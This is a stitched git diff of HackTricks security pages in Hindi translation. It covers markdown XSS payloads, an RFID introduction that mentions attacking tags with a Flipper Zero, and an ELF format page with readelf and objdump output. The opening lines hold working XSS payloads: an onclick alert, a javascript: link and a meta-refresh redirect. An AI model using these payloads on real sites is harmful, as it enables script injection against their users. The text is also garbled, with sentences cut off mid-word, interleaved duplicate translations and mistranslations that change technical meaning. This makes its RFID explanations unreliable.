7WmS/6YZPXP+LPprbVgC0ul0Op1Op9Pp/gYrAa7fWhG7QQAAAABJRU5ErkJggg==);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
<http://\<meta\ http-equiv=\"refresh\"\ content=\"0;\ url=http://danlec.com/\"\>>
[text](http://danlec.com " [@danlec](/danlec) ")
[a](javascript:this;alert(1))
@ -187,10 +158,10 @@ _http://danlec_@.1 style=background-image:url(data:image/png;base64,iVBORw0KGgoA
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details>

View file

@ -2,55 +2,45 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की इच्छा रखते हैं? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।**
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके अपना योगदान दें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन हैकट्रिक्स में देखना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस चाहिए**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में**
</details>
## परिचय
**रेडियो फ्रिक्वेंसी आईडेंटिफिकेशन (RFID)** सबसे लोकप्रिय शॉर्ट-रेंज रेडियो समाधान है। यह आमतौर पर एक इकाई की पहचान करने वाली जानकारी को संग्रहीत और प्रसारित करने के लिए उपयोग किया जाता है।
**रेडियो फ्रक्वेंसी आईडेंटिफिकेशन (RFID)** सबसे लोकप्रिय शॉर्ट-रेंज रेडियो समाधान है। यह आम तौर पर किसी एंटिटी की पहचान करने वाली जानकारी को स्टोर और ट्रांसमिट करने के लिए उपयोग किया जाता है।
एक RFID टैग **अपनी स्वयं की शक्ति स्रोत (सक्रिय)** पर निर्भर कर सकता है, जैसे कि एक एम्बेडेड बैटरी, या पठन एंटीना से अपनी शक्ति प्राप्त कर सकता है जो प्राप्त रेडियो तरंगों से उत्पन्न धारा का उपयोग करती है (**निष्क्रिय**).
एक RFID टैग **अपने व्यावसायिक बैटरी** जैसे **अपने विद्युत स्रोत (सक्रिय)** पर निर्भर कर सकता है, या पठन एंटीना से अपनी शक्ति प्राप्त कर सकता है जो प्राप्त रेडियो तरंगों से **उत्प्रेरित धरती वर्तनी** का उपयोग करता है (**निष्क्रिय**).
### वर्ग
EPCglobal ने RFID टैगों को छः श्रेणियों में विभाजित किया है। प्रत्येक श्रेणी में एक टैग के पास पिछली श्रेणी में सूचीबद्ध सभी क्षमताएं होती हैं, जिससे यह पिछली श्रेणी के साथ संगत हो जाता है।
EPCglobal ने RFID टैगों को छः श्रेणियों में विभाजित किया है। प्रत्येक श्रेणी में एक टैग में पिछली श्रेणी में सूचीत सभी क्षमताएँ होती हैं, जिससे यह पिछले संगणक में संग्रहित जानकारी को बदला नहीं जा सकता है।
* **कक्षा 0** टैग **निष्क्रिय** टैग होते हैं जो **UHF** बैंड में कार्य करते हैं। विक्रेता उन्हें उत्पादन कारख़ाने में पूर्व-प्रोग्राम करता है। इसलिए, उनकी मेमोरी में संग्रहित जानकारी को आप **बदल नहीं सकते**
* **कक्षा 1** टैग एचएफ बैंड में भी कार्य कर सकते हैं। इसके अलावा, इन्हें उत्पादन के बाद केवल एक बार **लिखा जा सकता है**। कई कक्षा 1 टैग उनके प्राप्त करने वाले कमांडों के **साइक्लिक रेडंडेंसी चेक्स** (CRC) को प्रोसेस कर सकते हैं। CRC त्रुटि का पता लगाने के लिए कमांडों के अंत में कुछ अतिरिक्त बाइट्स होते हैं।
* **कक्षा 2** टैग को **एकाधिक बार लिखा जा सकता है**
* **कक्षा 3** टैग में **एम्बेडेड सेंसर** हो सकते हैं जो मौसमी पैरामीटर, जैसे मौजूदा तापमान या टैग की गति, को रिकॉर्ड कर सकते हैं। ये टैग **अर्ध-निष्क्रिय** होते हैं, क्योंकि इनमें एक एम्बेडेड **बैटरी** जैसे एक एकीकृत शक्ति स्रोत होता है, लेकिन वे अन्य टैग या पाठकों के साथ वायरलेस संचार **प्रारंभ नहीं कर सकते** हैं
* **कक्षा 4** टैग इसी कक्षा के अन
### हमला
* **कक्षा 0** टैग **निष्क्रिय** टैग होते हैं जो **UHF** बैंड में का करते हैं। विक्रेता उन्हें उत्पादन कारख़ाने में **पूर्व-कार्यकृत** करता है। इसके परिणामस्वरूप, आप उनकी मेमोरी में स्टोर की गई जानकारी को **बदल नहीं** सकते
* **कक्षा 1** टैग एचएफ बैंड में भी काम कर सकते हैं। साथ ही, उन्हें उत्पादन के बाद केवल एक बार **लिखा जा सकता है**। कई कक्षा 1 टैग उनके प्राप्त किए गए कमांडों के **साइक्लिक रेडंडेंसी चेक्स** (CRCs) को प्रोसेस कर सकते हैं। CRCs त्रुटि का पता लगाने के लिए कमांडों के अंत में कुछ अतिरिक्त बाइट्स होते हैं।
* **कक्षा 2** टैग **एकाधिक बार लिखा जा सकता है**
* **कक्षा 3** टैग में **एम्बेडेड सेंसर** हो सकते हैं जो पर्यावरणीय पैरामीटर्स जैसे वर्तमान तापमान या टैग की गति को रिकॉर्ड कर सकते हैं। ये टैग **अर्ध-निष्क्रिय** होते हैं, क्योंकि हालांकि उनके पास एक एम्बेडेड **बैटरी** जैसे एक एम्बेडेड शक्ति स्रोत होता है, वे अन्य टैग या रीडर्स के साथ वायरलेस **संचार** को **प्रारंभ नहीं** कर सकते
* **कक्षा 4** टैग इसी कक्षा के अन्य टैगों के साथ संवाद आरंभ कर सकते हैं, जिससे वे **सक्रिय टैग** बन जाते हैं।
* **कक्षा 5** टैग अन्य टैगों को शक्ति प्रदान कर सकते हैं और सभी पिछले टैग कक्षाओं के साथ संवाद कर सकते हैं। कक्षा 5 टैग RFID रीडर के रूप में काम कर सकते हैं।
आप **फ्लिपर जीरो के साथ इन टैग्स पर हमला कर सकते हैं**:
### RFID टैग में स्टोर की गई जानकारी
{% content-ref url="../todo/radio-hacking/flipper-zero/fz-125khz-rfid.md" %}
[fz-125khz-rfid.md](../todo/radio-hacking/flipper-zero/fz-125khz-rfid.md)
{% endcontent-ref %}
एक RFID टैग की मेमोरी आम तौर पर चार प्रकार की जानकारी स्टोर करती है: **पहचान डेटा**, जो टैग से जुड़ी **एंटिटी की पहचान करती है** (इस डेटा में उपयोगकर्ता-निर्धारित क्षेत्र शामिल हैं, जैसे बैंक खाते); **सहायक डेटा**, जो एंटिटी के बारे में **अधिक विवरण** प्रदान करती है; **नियंत्रण डेटा**, टैग के आंतरिक **कॉन्फ़िगरेशन** के लिए उपयोग किया जाता है; और टैग की **निर्माता डेटा**, जिसमें एक टैग का अद्वितीय पहचानकर्ता (**UID**) और टैग के **उत्पादन**, **प्रकार**, और **विक्रेता** के बारे में विवरण होता है। आपको व्यावसायिक टैगों में पहले दो प्रकार की डेटा मिलेगी; अंतिम दो टैग के विक्रेता के आधार पर भिन्न हो सकते हैं।
## हाई-फ्रीक्वेंसी RFID टैग (13.56 MHz)
ISO मानक निर्दिष्ट करता है **एप्लिकेशन फैमिली आईडेंटिफायर (AFI)** मूल्य, एक कोड जो टैग किस प्रकार की वस्तु से संबंधित है दर्शाता है। एक और महत्वपूर्ण रजिस्टर, जिसे भी ISO द्वारा निर्दिष्ट किया गया है, डेटा स्टोरेज फॉर्मेट आईडेंटिफायर (**DSFID**), जो उपयोगकर्ता डेटा की **तार्किक संगठन** को परिभाषित करता है।
**हाई-फ्रीक्वेंसी टैग** का उपयोग एक अधिक जटिल रीडर-टैग इंटरेक्शन के लिए किया जाता है जब आपको क्रिप्टोग्राफी, एक बड़े दो-तरफ़ा डेटा ट्रांसफर, प्रमाणीकरण, आदि की आवश्यकता होती है।\
यह आमतौर पर बैंक कार्ड, सार्वजनिक परिवहन और अन्य सुरक्षित पास में पाया जाता है।
अधिकांश RFID **सुरक्षा नियंत्रण** मेमोरी में स्थित डेटा का उपयोग करते हैं जो प्रत्येक उपयोगकर्ता मेमोरी ब्लॉक और AFI और DSFID मान वाले विशेष रजिस्टर पर **पठन** या **लेखन** कार्रवाई को **प्रतिबंधित** करते हैं। ये **लॉक** **मेकेनिज़म** नियंत्रण मेमोरी में स्टोर किए गए डेटा का उपयोग करते हैं और विक्रेता द्वारा पूर्व-कॉन्फ़िगर किए गए **डिफ़ॉल्ट पासवर्ड** होते हैं लेकिन टैग मालिकों को **कस्टम पासवर्ड कॉन्फ़िगर** करने की अनुमति देते हैं।
**हाई-फ्रीक्वेंसी 13.56 MHz टैग एक सेट के मानक और प्रोटोकॉल हैं**। इन्हें आमतौर पर [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/) के रूप में संदर्भित किया जाता है, लेकिन यह हमेशा सही नहीं होता है। भौतिक और तार्किक स्तरों पर उपयोग होने वाले मूल्यांकन प्रोटोकॉल सेट ISO 14443 है। उच्च स्तर के प्रोटोकॉल, साथ ही वैकल्पिक मानक (जैसे ISO 19092), इस पर आधारित होते हैं। बहुत से लोग इस प्रौद्योगिकी को **नियर फ़ील्ड संचार (NFC)** के रूप में संदर्भित करते हैं, जो 13.56 MHz फ़्रीक्वेंसी पर कार्य करने वाले उपकरणों के लिए एक शब्द है।
### कम और उच्च फ्रीक्वेंसी टैग तुलना
<figure><img src="../.gitbook/assets/image (22).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (27).png" alt=""><figcaption></figcaption></figure>
सीधे शब्दों में कहें तो, NFC की वाणिज्यिक व्यवस्था इस प्रकार काम करती है: कार्ड बनाने वाली कंपनी द्वारा प्रेषण प्रोटोकॉल चुना जाता है और यह निम्न स्तरीय ISO 14443 पर आधारित होता है। उदाहरण के लिए, NXP ने अपना उच्च स्तरीय प्रेषण प्रोटोकॉल Mifare का आविष्कार किया। लेकिन निम्न स्तर पर, Mifare कार्ड ISO 14443-A मानक पर आधारित होते हैं।
## कम फ्रीक्वेंसी RFID टैग (125kHz)
फ्लिपर निम्न स्तरीय ISO 14443 प्रोटोकॉल, साथ ही Mifare Ultralight डेटा ट्रांसफर प्रोटोकॉल और बैंक कार्ड में उपयोग होने वाले EMV के साथ संवाद कर सकता है। हम Mifare Classic और NFC NDEF के समर्थन जोड़ने पर काम कर रहे हैं। NFC के बनाने वाले प्रोटोकॉल और मानकों का एक विस्तृत अध्ययन एक अलग लेख के लिए महत्वपूर्ण है, जिसे हम बाद में अपलोड करने की योजना बना रहे हैं।
ISO 14443-A मानक पर आधारित सभी हाई-फ्रीक्वेंसी कार्डों में एक अद्वितीय चिप आईडी होता है। यह कार्ड की सीरियल नंबर की तरह कार्ड का कार्य करता है, जैसे नेटवर्क कार्ड का MAC पता। **आमतौर पर, UID 4 या 7 बाइट लंबा होता है**, लेकिन कभी-कभी यह **10 तक** जा सकता है। UID एक गोपनीयता नहीं है और इसे आसानी से पढ़ा जा सकता है, **कभी-कभी कार्ड पर छपा होता है**
UID का उपयोग प्रमाणीकरण और पहुंच प्रदान करने के लिए कई एक्सेस कंट्रोल सिस्टम करते हैं। कभी-कभी ऐसा होता है **जब भी** RFID टैग्स **क्रिप्टोग्राफी का समर्थन करते हैं**। ऐसे **गलत उपयोग** से वे सुरक्षा के मामले में दुम्ब द्विसौंदर्य 125 kHz कार्डों के स्तर तक आ जाते हैं। वर्चुअल कार्ड (जैसे Apple Pay) फ़ोन मालिक अपने भुगतान ऐप के साथ दरवाज़े नहीं खोलेंगे, इसलिए वे एक गतिशील UID का उपयोग करते हैं।
* **कम दायरा** — हाई-फ्रीक्वेंसी कार्डों को विशेष रूप से इसलिए डिज़ाइन किया जाता है कि उन्हें रीडर के पास रखना होता है। इससे कार्ड को अनधिकृत इंटरेक्शन से सुरक्षित रखने में भी मदद मिलती है। हमने प्रबंधित किए गए उच्च दायरे वाले रीडर के साथ अधिकतम पठन दायरा 15 सेमी तक प्राप्त किया था।
* **उन्नत प्रोटोकॉल** — 424 kbps तक की डेटा ट्रांसफर गति उच्च स्तर के प्रोटोकॉल को समर्थन करती है, जिससे पूर्ण-विक
**कम फ्रीक्वेंसी टैग** उन सिस्टमों में उपयोग किए जाते हैं जो **उच्च सुरक्षा की आवश्यकता नहीं है**: इमारत एक्सेस, इंटरकॉम की, जिम सदस्यता कार

View file

@ -0,0 +1,369 @@
# ELF ट्रिक्स
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का** **अनुसरण** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** [**hacktricks**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details>
## प्रोग्राम हेडर्स
यह लोडर को बताते हैं कि ELF को मेमोरी में कैसे लोड करना है:
```bash
readelf -lW lnstat
Elf file type is DYN (Position-Independent Executable file)
Entry point 0x1c00
There are 9 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0001f8 0x0001f8 R 0x8
INTERP 0x000238 0x0000000000000238 0x0000000000000238 0x00001b 0x00001b R 0x1
[Requesting program interpreter: /lib/ld-linux-aarch64.so.1]
LOAD 0x000000 0x0000000000000000 0x0000000000000000 0x003f7c 0x003f7c R E 0x10000
LOAD 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x000528 0x001190 RW 0x10000
DYNAMIC 0x00fc58 0x000000000001fc58 0x000000000001fc58 0x000200 0x000200 RW 0x8
NOTE 0x000254 0x0000000000000254 0x0000000000000254 0x0000e0 0x0000e0 R 0x4
GNU_EH_FRAME 0x003610 0x0000000000003610 0x0000000000003610 0x0001b4 0x0001b4 R 0x4
GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10
GNU_RELRO 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x0003b8 0x0003b8 R 0x1
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.gnu.build-id .note.ABI-tag .note.package .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
03 .init_array .fini_array .dynamic .got .data .bss
04 .dynamic
05 .note.gnu.build-id .note.ABI-tag .note.package
06 .eh_frame_hdr
07
08 .init_array .fini_array .dynamic .got
```
पिछले कार्यक्रम में **9 कार्यक्रम हेडर** हैं, फिर, **सेगमेंट मैपिंग** इसका संकेत देता है कि प्रत्येक सेक्शन किस प्रोग्राम हेडर (00 से 08 तक) में स्थित है।
### PHDR - प्रोग्राम हेडर
प्रोग्राम हेडर तालिकाएँ और मेटाडेटा स्वयं को समाहित करता है।
### INTERP
बाइनरी को मेमोरी में लोड करने के लिए उपयोग करने के लिए लोडर का पथ दर्शाता है।
### LOAD
ये हेडर इसका संकेत देते हैं कि **मेमोरी में बाइनरी को कैसे लोड करें**।\
प्रत्येक **LOAD** हेडर एक **मेमोरी क्षेत्र** (आकार, अनुमतियाँ और संरेखण) को दर्शाता है और ELF **बाइनरी के बाइट्स की कॉपी करने के लिए** संकेत देता है।
उदाहरण के लिए, दूसरा हेडर 0x1190 का आकार है, 0x1fc48 पर स्थित होना चाहिए, पढ़ने और लिखने की अनुमतियों के साथ है और 0xfc48 से 0x528 के साथ भरा जाएगा (यह सभी आरक्षित स्थान को भरता नहीं है)। यह मेमोरी सेक्शन `.init_array .fini_array .dynamic .got .data .bss` को शामिल करेगा।
### DYNAMIC
यह हेडर कार्यक्रमों को उनके पुस्तकालय आवश्यकताओं से लिंक करने और स्थानांतरणों को लागू करने में मदद करता है। **`.dynamic`** सेक्शन की जाँच करें।
### NOTE
बाइनरी के बारे में विक्रेता मेटाडेटा जानकारी संग्रहित करता है।
### GNU\_EH\_FRAME
स्टैक अनवाइंड टेबल का स्थान परिभाषित करता है, जिसे डीबगर और सी++ अपशिष्ट-हैंडलिंग-रनटाइम फ़ंक्शनों द्वारा उपयोग किया जाता है।
### GNU\_STACK
स्टैक निषेध रक्षा की विन्यासिकता को शामिल करता है। यदि सक्षम है, तो बाइनरी स्टैक से कोड नहीं चला सकेगा।
### GNU\_RELRO
बाइनरी की RELRO (स्थानांतरण केवल पढ़ने योग्य) विन्यासिकता को दर्शाता है। यह सुरक्षा विशेष रूप से मेमोरी के कुछ सेक्शन को केवल पढ़ने योग्य मार्क करेगी (जैसे `GOT` या `init` और `fini` टेबल) जब प्रोग्राम लोड हो जाएगा और इसे चलाने से पहले।
पिछले उदाहरण में 0x3b8 बाइट को 0x1fc48 पर पढ़ने योग्य रूप में कॉपी किया जा रहा है, `.init_array .fini_array .dynamic .got .data .bss` सेक्शन को प्रभावित करते हुए।
ध्यान दें कि RELRO आंशिक या पूर्ण हो सकता है, आंशिक संस्करण **`.plt.got`** सेक्शन को संरेखित करता है, जिसे **लेजी बाइंडिंग** के लिए उपयोग किया जाता है और इस स्मृति स्थान को **लिखने की अनुमति** होनी चाहिए ताकि पहली बार उनकी स्थान खोजी जाए।
### TLS
TLS प्रविष्टियों की एक तालिका को परिभाषित करता है, जो सूत्र-स्थानीय चरित्र चर्चाओं के बारे में जानकारी संग्रहित करती है।
## सेक्शन हेडर
सेक्शन हेडर ELF बाइनरी का एक और विस्तृत दृश्य प्रदान करता है।
```
objdump lnstat -h
lnstat: file format elf64-littleaarch64
Sections:
Idx Name Size VMA LMA File off Algn
0 .interp 0000001b 0000000000000238 0000000000000238 00000238 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
1 .note.gnu.build-id 00000024 0000000000000254 0000000000000254 00000254 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
2 .note.ABI-tag 00000020 0000000000000278 0000000000000278 00000278 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
3 .note.package 0000009c 0000000000000298 0000000000000298 00000298 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
4 .gnu.hash 0000001c 0000000000000338 0000000000000338 00000338 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
5 .dynsym 00000498 0000000000000358 0000000000000358 00000358 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
6 .dynstr 000001fe 00000000000007f0 00000000000007f0 000007f0 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
7 .gnu.version 00000062 00000000000009ee 00000000000009ee 000009ee 2**1
CONTENTS, ALLOC, LOAD, READONLY, DATA
8 .gnu.version_r 00000050 0000000000000a50 0000000000000a50 00000a50 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
9 .rela.dyn 00000228 0000000000000aa0 0000000000000aa0 00000aa0 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
10 .rela.plt 000003c0 0000000000000cc8 0000000000000cc8 00000cc8 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
11 .init 00000018 0000000000001088 0000000000001088 00001088 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
12 .plt 000002a0 00000000000010a0 00000000000010a0 000010a0 2**4
CONTENTS, ALLOC, LOAD, READONLY, CODE
13 .text 00001c34 0000000000001340 0000000000001340 00001340 2**6
CONTENTS, ALLOC, LOAD, READONLY, CODE
14 .fini 00000014 0000000000002f74 0000000000002f74 00002f74 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
15 .rodata 00000686 0000000000002f88 0000000000002f88 00002f88 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
16 .eh_frame_hdr 000001b4 0000000000003610 0000000000003610 00003610 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
17 .eh_frame 000007b4 00000000000037c8 00000000000037c8 000037c8 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
18 .init_array 00000008 000000000001fc48 000000000001fc48 0000fc48 2**3
CONTENTS, ALLOC, LOAD, DATA
19 .fini_array 00000008 000000000001fc50 000000000001fc50 0000fc50 2**3
CONTENTS, ALLOC, LOAD, DATA
20 .dynamic 00000200 000000000001fc58 000000000001fc58 0000fc58 2**3
CONTENTS, ALLOC, LOAD, DATA
21 .got 000001a8 000000000001fe58 000000000001fe58 0000fe58 2**3
CONTENTS, ALLOC, LOAD, DATA
22 .data 00000170 0000000000020000 0000000000020000 00010000 2**3
CONTENTS, ALLOC, LOAD, DATA
23 .bss 00000c68 0000000000020170 0000000000020170 00010170 2**3
ALLOC
24 .gnu_debugaltlink 00000049 0000000000000000 0000000000000000 00010170 2**0
CONTENTS, READONLY
25 .gnu_debuglink 00000034 0000000000000000 0000000000000000 000101bc 2**2
CONTENTS, READONLY
```
### मेटा खंड
* **स्ट्रिंग टेबल**: यह सभी स्ट्रिंग्स को समायोजित करता है जो ELF फ़ाइल द्वारा आवश्यक हैं (लेकिन वास्तव में कार्यक्रम द्वारा उपयोग की जाने वाली नहीं।) उदाहरण के लिए, यह खंड धाराएँ नामों को शामिल करता है जैसे `.text` या `.data`। और यदि `.text` स्ट्रिंग टेबल में 45 ऑफसेट पर है तो यह **नाम** फ़ील्ड में **45** नंबर का उपयोग करेगा।
* स्ट्रिंग टेबल का पता लगाने के लिए, ELF में स्ट्रिंग टेबल के लिए एक पॉइंटर होता है।
* **सिम्बल टेबल**: इसमें सिम्बल के बारे में जानकारी होती है जैसे नाम (स्ट्रिंग टेबल में ऑफसेट), पता, आकार और सिम्बल के बारे में अधिक मेटाडेटा।
### मुख्य खंड
* **`.text`**: कार्यक्रम के निर्देशों को चलाने के लिए।
* **`.data`**: कार्यक्रम में परिभाषित मान वाले ग्लोबल वेरिएबल्स।
* **`.bss`**: अपरिभाषित ग्लोबल वेरिएबल्स (या जीरो से आरंभित)। यहाँ के वेरिएबल्स स्वचालित रूप से शून्य पर आरंभित होते हैं इसलिए बाइनरी में अनावश्यक शून्यों को जोड़ने से बचाते हैं।
* **`.rodata`**: स्थिर ग्लोबल वेरिएबल्स (केवल पढ़ने योग्य खंड)।
* **`.tdata`** और **`.tbss`**: जब स्थानीय धागी वेरिएबल्स का उपयोग किया जाता है (C++ में `__thread_local` या `__thread` में) तो जैसे .data और .bss।
* **`.dynamic`**: नीचे देखें।
## सिम्बल्स
सिम्बल्स एक नामित स्थान हैं कार्यक्रम में जो कि एक फ़ंक्शन, एक ग्लोबल डेटा ऑब्ज
```
readelf -s lnstat
Symbol table '.dynsym' contains 49 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000001088 0 SECTION LOCAL DEFAULT 12 .init
2: 0000000000020000 0 SECTION LOCAL DEFAULT 23 .data
3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strtok@GLIBC_2.17 (2)
4: 0000000000000000 0 FUNC GLOBAL DEFAULT UND s[...]@GLIBC_2.17 (2)
5: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strlen@GLIBC_2.17 (2)
6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND fputs@GLIBC_2.17 (2)
